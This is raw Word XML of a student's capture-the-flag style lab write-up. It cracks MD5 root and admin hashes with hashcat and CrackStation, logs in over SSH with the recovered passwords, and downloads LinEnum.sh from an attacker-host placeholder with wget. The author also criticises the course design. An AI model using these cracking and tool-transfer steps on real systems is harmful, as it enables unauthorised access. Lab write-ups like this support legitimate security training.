    <w:p w14:paraId="170D7977" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="7AF98066" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:lastRenderedPageBreak/>
        <w:t>Root: f357a0c52799563c7c7b76c1e7543a32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BFD5C5" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Admin: 0d0ea5111e3c1def594c1684e3b9be84</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A78C533" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="36321F2D" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Let’s see what type of hash it is by using an online tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE2DF88" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="09A64A9D" w14:textId="43458BE5" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3190B75A" wp14:editId="7080F823">
            <wp:extent cx="5511569" cy="3571875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7426348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8861" cy="3583082"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B891338" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="64B32F4C" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">I want to try to get practice with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">, but there is no guidance with this, only a mention that “you get break this with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">”. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492A5C49" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">(*Another lapse in course creation. You must show, whereas telling something detracts from the lesson, otherwise you should be doing </w:t>
      </w:r>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">that, </w:t>
      </w:r>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">instead of your lesson. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79234903" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">Mentor did show using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>crackstation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> and that’s how he got the hashes, HOWEVER, why mention </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> and not use it? This is a meta-issue with course structure…)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B4F8E4" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="0EBD25F6" w14:textId="4A097A72" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17D6C240" wp14:editId="73BCC0E6">
            <wp:extent cx="7047158" cy="1962150"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="6764067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059280" cy="1965525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09660DC3" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">(This is what my </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>atk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> machine looked like, making the hashes in a nano file, while I had a note researched for the syntax reference for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> in the background).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2A9894" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="1C2C3C16" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>I’m calling my new file made with nano “hash1.txt” and it’s the thing we’re trying to crack, so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6809D50E" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="5C3F7BB6" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -m 0 -a 0 -o myOutput.txt hash1.txt /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A79D81A" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="7F640EE5" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9C62E6" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>-m 0:</w:t>
      </w:r>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> Specifies the hash type (0 for MD5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568AE732" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>(targets md5, which I identified from hases.com Offline identification was not covered adequately to do without this tool, so the website’s the way to go in this context).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D45A9B" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>-a 0</w:t>
      </w:r>
      <w:r w:rsidRPr="007A67A4">
        <w:t>: Specifies the attack mode (0 for a dictionary attack, which should be good enough).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A4C64C" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>-o myOutput.txt:</w:t>
      </w:r>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> Specifies the output file for cracked hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16583139" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hash1.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="007A67A4">
        <w:t>: The file containing the MD5 hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5065027E" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>/share/wordlists/rockyou.txt: file to the reference wordlist to try and get hashes from, looking for a collision.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1D6ABF" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">(if you got a set of wordlists, you can use [locate rockyou.txt] or just download something from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>seclists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> repo]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59950C75" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="460BD3FF" w14:textId="6BBBBB72" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24E6E0D3" wp14:editId="575A4561">
            <wp:extent cx="5915025" cy="3557008"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="591728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5642" cy="3563393"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED0C244" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="39B9825F" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">The second one, for admin, is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>mrsheafy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCB3DEC" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">The hash from the first one gets returned, showing it’s not in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>rockyouwordlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C133E2F" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> After bleeding that much, I moved into crackstation.com and got the root one after all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4945546F" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="03C50B7B" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Root: f357a0c52799563c7c7b76c1e7543a32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39562967" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>n100906</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397F2557" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Admin: 0d0ea5111e3c1def594c1684e3b9be84</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC85B09" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>Mrsheafy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A595FB4" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="01B96AC4" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="414183AC" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>2hr mark passed, machine ended</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0965263F" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>New IP used in screenshots from here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0878F151" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>CRUCIAL ERRORS IN EDUCTION METHODS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CE6D45" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>If this were properly introduced, some changes need to be made:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6442B66C" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Either set up a wordlist to be used on the students’ machines, or provide a wordlist with course materials that has the hash collision in it, or introduce </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>crackstation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> as valid and in-scope rather than the undertone that “you should be able to do this all offline” and then using an online resource, while mentioning an offline resource you don’t show. (If that sentence is confusing, then you realize the hypocrisy involved here.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5D3C93" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">[n100906] was not in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>rockyou</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">, which was the largest of a handful of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>seclists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> I ran with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> to try and get the collision. Obviously, this is slower than a plug and play like crack station.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E9D076" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="69EEF87C" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">(remember r00t is with 0’s in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>sqlite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> database we </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>cat’ed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> out before)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBFA10A" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="4591B700" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>ssh r00t@&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>ip.target</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022667F3" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>(when prompted for the password, put it in)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166E8CCD" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Password&gt;&gt; [n100906]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1C5ECE" w14:textId="0B7CD21B" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="484BD4BF" wp14:editId="1D03D84B">
            <wp:extent cx="5683294" cy="2447925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8978304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5957" cy="2453379"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6DD683" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>This is the welcome message we should expect, an it’s Ubuntu as we expected from our enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CB129E" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">We want to use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>linenum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>, but need to get it on the machine first *Dev oversight,  you cannot use tools that are outside of the expected work environment; that’s just poor setup of the educational environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9605A0" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>(10 minutes burned for this is an exhausting tax on the students that the teacher should avoid because our competitors will out-pace us if we accumulate such garbage mistakes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6296E0" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="6D4301B7" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="3EA5AA83" w14:textId="36574BDD" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="202D71EA" wp14:editId="014EBC3C">
            <wp:extent cx="5543725" cy="2476500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2946186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1547" cy="2479994"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="748B461E" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="1E0DE7A2" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">Assume I got </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>linenum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> on the desktop as shown in the top terminal. I want to start a simple python server (using 8080 because 80 is occupied) so we can </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>linenum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> onto the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>ssh’d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> root account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167BF9B6" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="2D277603" w14:textId="447B765B" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A77DF46" wp14:editId="78CE6271">
            <wp:extent cx="6175772" cy="1628775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="99698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6805" cy="1631685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE72216" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="07138D66" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142428A5" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> http://&lt;ip.attacker&gt;:8080/LinEnum.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A380A52" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
